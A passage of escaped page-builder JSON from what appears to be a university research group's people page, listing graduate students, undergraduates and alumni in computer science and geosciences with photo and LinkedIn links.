\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 